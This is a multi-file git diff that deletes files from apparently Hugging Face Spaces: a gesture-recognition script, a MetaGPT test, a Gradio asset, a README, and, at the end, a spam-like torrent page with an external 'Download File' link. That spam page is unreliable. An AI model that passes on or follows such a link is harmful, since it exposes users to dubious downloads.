= extractive(LsaSummarizer(), doc) - - elif model == "BERT": - modelbert = Summarizer('distilbert-base-uncased', hidden=[-1,-2], hidden_concat=True) - result = modelbert(doc) - summary = ''.join(result) - - return summary \ No newline at end of file diff --git a/spaces/dandan4272/hand_gesture_rec/predict_st_gcn.py b/spaces/dandan4272/hand_gesture_rec/predict_st_gcn.py deleted file mode 100644 index ca38f95e79c28f3b0425abf32a5ae6e2e4b75a66..0000000000000000000000000000000000000000 --- a/spaces/dandan4272/hand_gesture_rec/predict_st_gcn.py +++ /dev/null @@ -1,800 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -import csv -import copy -import argparse -import gc -import itertools -import os -import time - -import cv2 -from PIL import Image -from torch.nn import functional as F - -import cv2 as cv -import numpy as np -import mediapipe as mp -import torch - -from model.stgcn import TwoStreamSpatialTemporalGraph, normalize_points_with_size, scale_pose -# from main import ACTION_MODEL_MAX_FRAMES -from model.stgcn.stgcn import STGCN - - -def prepocess(pts, image_size): - """Predict actions from single person skeleton points and score in time sequence. - Args: - pts: (numpy array) points and score in shape `(t, v, c)` where - t : inputs sequence (time steps)., - v : number of graph node (body parts)., - c : channel (x, y, score)., - image_size: (tuple of int) width, height of image frame. - Returns: - (numpy array) Probability of each class actions. - """ - pts[:, :, :2] = normalize_points_with_size(pts[:, :, :2], image_size[0], image_size[1]) - pts[:, :, :2] = scale_pose(pts[:, :, :2]) - # pts = np.concatenate((pts, np.expand_dims((pts[:, 1, :] + pts[:, 2, :]) / 2, 1)), axis=1) - # - # pts = torch.tensor(pts, dtype=torch.float32) - # pts = pts.permute(2, 0, 1)[None, :] - # - # mot = pts[:, :2, 1:, :] - pts[:, :2, :-1, :] - # mot = mot.to(self.device) - # pts = pts.to(self.device) - - # out = self.model((pts, mot)) - - # return out.detach().cpu().numpy() - return pts - - -def get_args(): - parser = argparse.ArgumentParser() - - parser.add_argument("--device", type=int, default=0) - parser.add_argument("--width", help='cap width', type=int, default=640) - parser.add_argument("--height", help='cap height', type=int, default=480) - - parser.add_argument('--use_static_image_mode', action='store_true') - parser.add_argument("--min_detection_confidence", - help='min_detection_confidence', - type=float, - default=0.7) - parser.add_argument("--min_tracking_confidence", - help='min_tracking_confidence', - type=int, - default=0.5) - parser.add_argument("--action_frames", - help='action_frames', - type=int, - default=15) - args = parser.parse_args() - - return args - - - - -def prob_viz(res, actions, input_frame, colors): - output_frame = input_frame.copy() - for num, prob in enumerate(res): - # cv2.rectangle(output_frame, (0, 60 + num * 40), (int(prob * 100), 90 + num * 40), colors[num], -1) - cv.putText(output_frame, actions[num], (0, 85 + num * 40), cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, - cv.LINE_AA) - return output_frame - - -def predict(input, model, device): - model.to(device) - with torch.no_grad(): - input1,input2 = input - input1=input1.to(device) - input2=input2.to(device) - - # out = model(input1,input2) - out = model(input1) - - out = torch.squeeze(out) - out = F.softmax(out) - _, pre = torch.max(out.data, 0) - # out_prop = out[pre.item()-1] - # return pre.item() - return out.cpu().numpy(),pre.item() - - -# def det_image(): -# # 引数解析 ################################################################# -# args = get_args() -# ACTION_MODEL_MAX_FRAMES = 15 -# -# load_iters = 3000 # 加载之前训练的模型(指定迭代次数) -# device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") -# -# threshold = 0.996 -# graph_args = {'strategy': 'spatial'} -# -# model = TwoStreamSpatialTemporalGraph(graph_args, 10) -# model.eval() -# pre = torch.load('weights/data_aug2/_hand_stgcn_fps15_21node_sgd_40.pth') -# model.load_state_dict(pre, False) -# model = torch.nn.DataParallel(model).cuda() -# -# cap_device = args.device -# cap_width = args.width -# cap_height = args.height -# -# use_static_image_mode = args.use_static_image_mode -# min_detection_confidence = args.min_detection_confidence -# min_tracking_confidence = args.min_tracking_confidence -# -# use_brect = True -# joints_list = [] -# # 读取视频 ############################################################### -# video_path = 'datasets/test_video/test2.mp4' -# cap = cv.VideoCapture(0) -# cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width) -# cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height) -# -# # モデルロード ############################################################# -# mp_hands = mp.solutions.hands -# # print(mp_hands.Hands_CONNECTIONS) -# -# hands = mp_hands.Hands( -# static_image_mode=use_static_image_mode, -# max_num_hands=1, -# min_detection_confidence=min_detection_confidence, -# min_tracking_confidence=min_tracking_confidence, -# ) -# -# actions = np.array( -# ['shake_hand', 'palm', 'fist', 'clock_wise', 'anti_clockwise', 'ok', 'thumb', 'v', 'heart', 'no_gesture']) -# -# point_history = [] -# x = np.zeros((21, 2)) -# point_history.append(x) -# action_name = 'no_gesture' -# index_frame = 0 -# times = 0 -# while True: -# -# # 读取视频/图像 ##################################################### -# ret, image = cap.read() -# if not ret: -# break -# image = cv.flip(image, 1) # 镜像 -# image = cv.resize(image, (640, 480)) -# debug_image = copy.deepcopy(image) -# -# # ############################################################# -# image = cv.cvtColor(image, cv.COLOR_BGR2RGB) -# -# image.flags.writeable = False -# results = hands.process(image) -# image.flags.writeable = True -# index_frame += 1 -# # #################################################################### -# if results.multi_hand_landmarks is not None: -# times += 1 -# -# for hand_landmarks, handedness in zip(results.multi_hand_landmarks, -# results.multi_handedness): -# -# # 外接矩形計算 -# brect = calc_bounding_rect(debug_image, hand_landmarks) -# # 关键点计算 -# landmark_list, joints = calc_landmark_list(debug_image, hand_landmarks) -# # if index_frame %3 == 0: -# joints_list.append(np.array(joints)) -# -# # 描画 -# debug_image = draw_bounding_rect(use_brect, debug_image, brect) -# debug_image = draw_landmarks(debug_image, landmark_list) -# -# if len(joints_list) == ACTION_MODEL_MAX_FRAMES: -# pts = np.array(joints_list, dtype=np.float32) -# pts = prepocess(pts, (640, 480)) -# pts = torch.from_numpy(pts) -# pts = torch.unsqueeze(pts, dim=0) -# out = model(pts) -# -# out = F.softmax(out) -# -# index = out[0].argmax() -# action_name1 = actions[index] -# action = '{}: {:.2f}%'.format(action_name, out[0].max() * 100) -# joints_list = [] -# print(action) -# if out[0].max() > threshold: -# action_name1 = action_name1 -# else: -# action_name1 = 'no_gesture' -# -# if action_name != action_name1: -# # times += 1 -# # ACTION_MODEL_MAX_FRAMES = 15 -# action_name = action_name1 -# # break -# # action_name ='no_gesture' -# else: -# # ACTION_MODEL_MAX_FRAMES = 15 -# # times -= 1 -# action_name = action_name1 -# -# elif len(joints_list) == 0: -# action_name = 'no_gesture' -# -# # 画面反映 ############################################################# -# cv.putText(debug_image, ' '.join(action_name), (3, 30), -# cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv.LINE_AA) -# cv.imshow('Hand Gesture Recognition', debug_image) -# # 处理(ESC:关闭) ################################################# -# key = cv.waitKey(1) -# if key == 27: # ESC -# break -# cap.release() -# cv.destroyAllWindows() - - -def det_image(video_path): - - - graph_args = {'strategy': 'spatial'} - - model = TwoStreamSpatialTemporalGraph(graph_args, 10) - model.eval() - pre = torch.load('./weights/_hand_stgcn_fps15_21node_sgd_40.pth',map_location=torch.device('cpu')) - model.load_state_dict(pre, False) - - if video_path is None or video_path == "": - # 判断是否有图片存在 - print("视频不存在!") - return None, None, None - args = get_args() - threshold = 0.98 - - # 引数解析 ################################################################# - cap_device = args.device - cap_width = args.width - cap_height = args.height - ACTION_MODEL_MAX_FRAMES = args.action_frames - use_static_image_mode = args.use_static_image_mode - min_detection_confidence = args.min_detection_confidence - min_tracking_confidence = args.min_tracking_confidence - - use_brect = True - joints_list = [] - # 读取视频 ############################################################### - - gc.collect() - output_video_path = "./output.mp4" - - cap = cv2.VideoCapture(video_path) - fourcc = cv.VideoWriter_fourcc('m', 'p', '4', 'v') - frame = cv.VideoWriter(output_video_path, fourcc, 30.0, (640, 480)) - - # cap = cv2.VideoCapture(video_path) - # fourcc = cv2.VideoWriter_fourcc(*"I420") # 编码器 - - # frame = cv2.VideoWriter(output_video_path, fourcc, 30.0, (int(cap.get(3)), int(cap.get(4)))) - - - # cap = cv.VideoCapture(video_path) - cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width) - cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height) - - # モデルロード ############################################################# - mp_hands = mp.solutions.hands - - hands = mp_hands.Hands( - static_image_mode=use_static_image_mode, - max_num_hands=1, - min_detection_confidence=min_detection_confidence, - min_tracking_confidence=min_tracking_confidence, - ) - - actions = np.array( - ['shake_hand', 'palm', 'fist', 'clock_wise', 'anti_clockwise', 'ok', 'thumb', 'v', 'heart', 'no_gesture']) - - point_history = [] - x = np.zeros((21, 2)) - point_history.append(x) - action_name = 'no_gesture' - index_frame = 0 - times = 0 - - os.system(""" - if [ -e '.output.mp4' ]; then - rm .output.mp4 - fi - """) - fps = 0.0 - - if cap.isOpened(): - while cap.isOpened(): - t1 = time.time() - - # 读取视频/图像 ##################################################### - ret, image = cap.read() - if not ret: - break - # image = cv.flip(image, 1) # 镜像 - image = cv.resize(image, (640, 480)) - debug_image = copy.deepcopy(image) - - # ############################################################# - image = cv.cvtColor(image, cv.COLOR_BGR2RGB) - - image.flags.writeable = False - results = hands.process(image) - image.flags.writeable = True - index_frame += 1 - # #################################################################### - if results.multi_hand_landmarks is not None: - times += 1 - - for hand_landmarks, handedness in zip(results.multi_hand_landmarks, - results.multi_handedness): - - # 外接矩形計算 - brect = calc_bounding_rect(debug_image, hand_landmarks) - # 关键点计算 - landmark_list, joints = calc_landmark_list(debug_image, hand_landmarks) - # if index_frame %3 == 0: - joints_list.append(np.array(joints)) - - # 描画 - debug_image = draw_bounding_rect(use_brect, debug_image, brect) - debug_image = draw_landmarks(debug_image, landmark_list) - - if len(joints_list) == ACTION_MODEL_MAX_FRAMES: - pts = np.array(joints_list, dtype=np.float32) - pts = prepocess(pts, (640, 480)) - pts = torch.from_numpy(pts) - pts = torch.unsqueeze(pts, dim=0) - out = model(pts) - - out = F.softmax(out) - - index = out[0].argmax() - action_name1 = actions[index] - action = '{}: {:.2f}%'.format(action_name, out[0].max() * 100) - joints_list = [] - print(action) - if out[0].max() > threshold: - action_name1 = action_name1 - else: - action_name1 = 'no_gesture' - - if action_name != action_name1: - # times += 1 - # ACTION_MODEL_MAX_FRAMES = 15 - action_name = action_name1 - # break - # action_name ='no_gesture' - else: - # ACTION_MODEL_MAX_FRAMES = 15 - # times -= 1 - action_name = action_name1 - - elif len(joints_list) == 0: - action_name = 'no_gesture' - - - # fps的计算 - fps = (fps + (1. / (time.time() - t1))) / 2 # 此处的time.time()就是检测完这张图片的结束时间,除以2是为了和之前的fps求一个平均 - print("fps= %.2f" % fps) - debug_image = cv2.putText(debug_image, "fps= %.2f" % (fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2) - # # 画面反映 ############################################################# - cv.putText(debug_image, ' '.join(action_name), (3, 70), - cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv.LINE_AA) - # cv.imshow('Hand Gesture Recognition', debug_image) - # # 处理(ESC:关闭) ################################################# - # key = cv.waitKey(1) - # if key == 27: # ESC - # break - - debug_image = Image.fromarray(cv2.cvtColor(debug_image, cv2.COLOR_BGR2RGB)) - # frame = pil_draw(frame, score_det_stat, bbox_det_stat, cls_det_stat, cls_index_det_stat, textFont, - # color_list, opt) - debug_image = cv2.cvtColor(np.asarray(debug_image), cv2.COLOR_RGB2BGR) - - # frame->video - frame.write(debug_image) - - - frame.release() - cap.release() - return output_video_path - # cv2.destroyAllWindows() - else: - print("视频加载失败!") - return None, None, None - cap.release() - cv.destroyAllWindows() - -def det_handpoints(args): - use_static_image_mode = args.use_static_image_mode - min_detection_confidence = args.min_detection_confidence - min_tracking_confidence = args.min_tracking_confidence - - use_brect = True - joints_list = [] - # 读取视频 ############################################################### - -if __name__ == '__main__': - - args = get_args() - ACTION_MODEL_MAX_FRAMES = 15 - - load_iters = 3000 # 加载之前训练的模型(指定迭代次数) - device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") - - threshold = 0.996 - graph_args = {'strategy': 'spatial'} - - model = TwoStreamSpatialTemporalGraph(graph_args, 10) - model.eval() - pre = torch.load('weights/data_aug2/_hand_stgcn_fps15_21node_sgd_40.pth') - model.load_state_dict(pre, False) - model = torch.nn.DataParallel(model).cuda() - det_image(args,model,threshold,video_path=0) - - - - - - -def calc_bounding_rect(image, landmarks): - image_width, image_height = image.shape[1], image.shape[0] - - landmark_array = np.empty((0, 2), int) - - for _, landmark in enumerate(landmarks.landmark): - landmark_x = min(int(landmark.x * image_width), image_width - 1) - landmark_y = min(int(landmark.y * image_height), image_height - 1) - - landmark_point = [np.array((landmark_x, landmark_y))] - - landmark_array = np.append(landmark_array, landmark_point, axis=0) - - x, y, w, h = cv.boundingRect(landmark_array) - - return [x, y, x + w, y + h] - - -def calc_landmark_list(image, landmarks): - image_width, image_height = image.shape[1], image.shape[0] - - landmark_point = [] - joint = [] - # キーポイント - for _, landmark in enumerate(landmarks.landmark): - landmark_x = min(int(landmark.x * image_width), image_width - 1) - landmark_y = min(int(landmark.y * image_height), image_height - 1) - landmark_z = landmark.z - landmark_v = landmark.visibility - # np.array(landmark_x) - landmark_point.append([landmark_x, landmark_y]) - joint.append([landmark_x, landmark_y,landmark_v]) - # landmark_point.append([landmark_x, landmark_y,landmark_z]) - return landmark_point,joint - - - -def pre_process_landmark(landmark_list): - temp_landmark_list = copy.deepcopy(landmark_list) - - # 相対座標に変換 - base_x, base_y = 0, 0 - for index, landmark_point in enumerate(temp_landmark_list): - if index == 0: - base_x, base_y = landmark_point[0], landmark_point[1] - - temp_landmark_list[index][0] = temp_landmark_list[index][0] - base_x - temp_landmark_list[index][1] = temp_landmark_list[index][1] - base_y - - # 1次元リストに変換 - temp_landmark_list = list( - itertools.chain.from_iterable(temp_landmark_list)) - - # 正規化 - max_value = max(list(map(abs, temp_landmark_list))) - - def normalize_(n): - return n / max_value - - temp_landmark_list = list(map(normalize_, temp_landmark_list)) - - return temp_landmark_list - - -def pre_process_point_history(image, point_history): - image_width, image_height = image.shape[1], image.shape[0] - - temp_point_history = copy.deepcopy(point_history) - - # 相対座標に変換 - base_x, base_y = 0, 0 - for index, point in enumerate(temp_point_history): - if index == 0: - base_x, base_y = point[0], point[1] - - temp_point_history[index][0] = (temp_point_history[index][0] - - base_x) / image_width - temp_point_history[index][1] = (temp_point_history[index][1] - - base_y) / image_height - - # 1次元リストに変換 - temp_point_history = list( - itertools.chain.from_iterable(temp_point_history)) - - return temp_point_history - - -def logging_csv(number, mode, landmark_list, point_history_list): - if mode == 0: - pass - if mode == 1 and (0 <= number <= 9): - csv_path = 'model/keypoint_classifier/keypoint.csv' - with open(csv_path, 'a', newline="") as f: - writer = csv.writer(f) - writer.writerow([number, *landmark_list]) - if mode == 2 and (0 <= number <= 9): - csv_path = 'model/point_history_classifier/point_history.csv' - with open(csv_path, 'a', newline="") as f: - writer = csv.writer(f) - writer.writerow([number, *point_history_list]) - return - - -def draw_landmarks(image, landmark_point): - # 接続線 - if len(landmark_point) > 0: - # 親指 - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[3]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[3]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[3]), tuple(landmark_point[4]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[3]), tuple(landmark_point[4]), - (255, 255, 255), 2) - - # 人差指 - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[6]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[6]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[6]), tuple(landmark_point[7]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[6]), tuple(landmark_point[7]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[7]), tuple(landmark_point[8]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[7]), tuple(landmark_point[8]), - (255, 255, 255), 2) - - # 中指 - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[10]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[10]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[10]), tuple(landmark_point[11]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[10]), tuple(landmark_point[11]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[11]), tuple(landmark_point[12]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[11]), tuple(landmark_point[12]), - (255, 255, 255), 2) - - # 薬指 - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[14]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[14]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[14]), tuple(landmark_point[15]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[14]), tuple(landmark_point[15]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[15]), tuple(landmark_point[16]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[15]), tuple(landmark_point[16]), - (255, 255, 255), 2) - - # 小指 - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[18]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[18]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[18]), tuple(landmark_point[19]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[18]), tuple(landmark_point[19]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[19]), tuple(landmark_point[20]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[19]), tuple(landmark_point[20]), - (255, 255, 255), 2) - - # 手の平 - cv.line(image, tuple(landmark_point[0]), tuple(landmark_point[1]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[0]), tuple(landmark_point[1]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[1]), tuple(landmark_point[2]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[1]), tuple(landmark_point[2]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[5]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[5]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[9]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[9]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[13]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[13]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[17]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[17]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[0]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[0]), - (255, 255, 255), 2) - - # キーポイント - for index, landmark in enumerate(landmark_point): - if index == 0: # 手首1 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 1: # 手首2 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 2: # 親指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 3: # 親指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 4: # 親指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 5: # 人差指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 6: # 人差指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 7: # 人差指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 8: # 人差指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 9: # 中指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 10: # 中指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 11: # 中指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 12: # 中指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 13: # 薬指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 14: # 薬指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 15: # 薬指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 16: # 薬指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 17: # 小指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 18: # 小指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 19: # 小指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 20: # 小指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - - return image - - -def draw_bounding_rect(use_brect, image, brect): - if use_brect: - # 外接矩形 - cv.rectangle(image, (brect[0], brect[1]), (brect[2], brect[3]), - (255, 0, 0), 3) - - return image - - -def draw_info_text(image, brect, hand_sign_text, conf - ): - cv.rectangle(image, (brect[0], brect[1]), (brect[2], brect[1] - 22), - (0, 0, 0), -1) - - # info_text = handedness.classification[0].label[0:] - if hand_sign_text != "": - # info_text = info_text + ':' + hand_sign_text - info_text = hand_sign_text + ':' + conf - - cv.putText(image, info_text, (brect[0] + 5, brect[1] - 4), - cv.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, cv.LINE_AA) - - # if finger_gesture_text != "": - # cv.putText(image, "Finger Gesture:" + finger_gesture_text, (10, 60), - # cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0), 4, cv.LINE_AA) - # cv.putText(image, "Finger Gesture:" + finger_gesture_text, (10, 60), - # cv.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255), 2, - # cv.LINE_AA) - - return image - - -def draw_point_history(image, point_history): - for index, point in enumerate(point_history): - if point[0] != 0 and point[1] != 0: - cv.circle(image, (point[0], point[1]), 1 + int(index / 2), - (152, 251, 152), 2) - - return image - - -def draw_info(image, fps, mode, number): - cv.putText(image, "FPS:" + str(fps), (10, 30), cv.FONT_HERSHEY_SIMPLEX, - 1.0, (0, 0, 0), 4, cv.LINE_AA) - cv.putText(image, "FPS:" + str(fps), (10, 30), cv.FONT_HERSHEY_SIMPLEX, - 1.0, (255, 255, 255), 2, cv.LINE_AA) - - mode_string = ['Logging Key Point', 'Logging Point History'] - if 1 <= mode <= 2: - cv.putText(image, "MODE:" + mode_string[mode - 1], (10, 90), - cv.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, - cv.LINE_AA) - if 0 <= number <= 9: - cv.putText(image, "NUM:" + str(number), (10, 110), - cv.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, - cv.LINE_AA) - return image - - - diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-dec38bdd.js b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-dec38bdd.js deleted file mode 100644 index 5d901471e0565cb3a4d1bf2aaaba55921d4e1d07..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-dec38bdd.js +++ /dev/null @@ -1,2 +0,0 @@ -import{S as m,e as u,s as r,F as d,G as b,w as _,u as f,H as g,a9 as v,ab as S,ac as h,ad as k}from"./index-39fce9e2.js";import{B as p}from"./Button-79f6e3bf.js";function w(a){let t;const l=a[3].default,e=v(l,a,a[4],null);return{c(){e&&e.c()},m(s,n){e&&e.m(s,n),t=!0},p(s,n){e&&e.p&&(!t||n&16)&&S(e,l,s,s[4],t?k(l,s[4],n,null):h(s[4]),null)},i(s){t||(_(e,s),t=!0)},o(s){f(e,s),t=!1},d(s){e&&e.d(s)}}}function B(a){let t,l;return t=new p({props:{elem_id:a[0],elem_classes:a[1],visible:a[2],explicit_call:!0,$$slots:{default:[w]},$$scope:{ctx:a}}}),{c(){d(t.$$.fragment)},m(e,s){b(t,e,s),l=!0},p(e,[s]){const n={};s&1&&(n.elem_id=e[0]),s&2&&(n.elem_classes=e[1]),s&4&&(n.visible=e[2]),s&16&&(n.$$scope={dirty:s,ctx:e}),t.$set(n)},i(e){l||(_(t.$$.fragment,e),l=!0)},o(e){f(t.$$.fragment,e),l=!1},d(e){g(t,e)}}}function C(a,t,l){let{$$slots:e={},$$scope:s}=t,{elem_id:n}=t,{elem_classes:o}=t,{visible:c=!0}=t;return a.$$set=i=>{"elem_id"in i&&l(0,n=i.elem_id),"elem_classes"in i&&l(1,o=i.elem_classes),"visible"in i&&l(2,c=i.visible),"$$scope"in i&&l(4,s=i.$$scope)},[n,o,c,e,s]}class q extends m{constructor(t){super(),u(this,t,C,B,r,{elem_id:0,elem_classes:1,visible:2})}}const H=q,j=["static"];export{H as Component,j as modes}; -//# sourceMappingURL=index-dec38bdd.js.map diff --git a/spaces/deepwisdom/MetaGPT/tests/metagpt/test_llm.py b/spaces/deepwisdom/MetaGPT/tests/metagpt/test_llm.py deleted file mode 100644 index f61793151e62f143356e75249474b9dd60b50de7..0000000000000000000000000000000000000000 --- a/spaces/deepwisdom/MetaGPT/tests/metagpt/test_llm.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -""" -@Time : 2023/5/11 14:45 -@Author : alexanderwu -@File : test_llm.py -@Modified By: mashenquan, 2023/8/20. Remove global configuration `CONFIG`, enable configuration support for business isolation. -""" - -import pytest - -from metagpt.config import Config -from metagpt.provider.openai_api import OpenAIGPTAPI as LLM, CostManager - - -@pytest.fixture() -def llm(): - options = Config().runtime_options - return LLM(options=options, cost_manager=CostManager(**options)) - - -@pytest.mark.asyncio -async def test_llm_aask(llm): - assert len(await llm.aask('hello world')) > 0 - - -@pytest.mark.asyncio -async def test_llm_aask_batch(llm): - assert len(await llm.aask_batch(['hi', 'write python hello world.'])) > 0 - - -@pytest.mark.asyncio -async def test_llm_acompletion(llm): - hello_msg = [{'role': 'user', 'content': 'hello'}] - assert len(await llm.acompletion(hello_msg)) > 0 - assert len(await llm.acompletion_batch([hello_msg])) > 0 - assert len(await llm.acompletion_batch_text([hello_msg])) > 0 diff --git a/spaces/dennis-fast/Talk2Elon/README.md b/spaces/dennis-fast/Talk2Elon/README.md deleted file mode 100644 index 32ddb690ab99ed716d40410a91eaa9f4d7c24b29..0000000000000000000000000000000000000000 --- a/spaces/dennis-fast/Talk2Elon/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Talk2Elon -emoji: 🤛 -colorFrom: green -colorTo: yellow -sdk: gradio -sdk_version: 3.0.13 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/diacanFperku/AutoGPT/Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent.md b/spaces/diacanFperku/AutoGPT/Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent.md deleted file mode 100644 index 5ee1956ee4f3165dbb08b87b6edc5f6f881e9636..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent.md +++ /dev/null @@ -1,17 +0,0 @@ -

      Cirque du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent


      Download Filehttps://gohhs.com/2uFUzd



      -
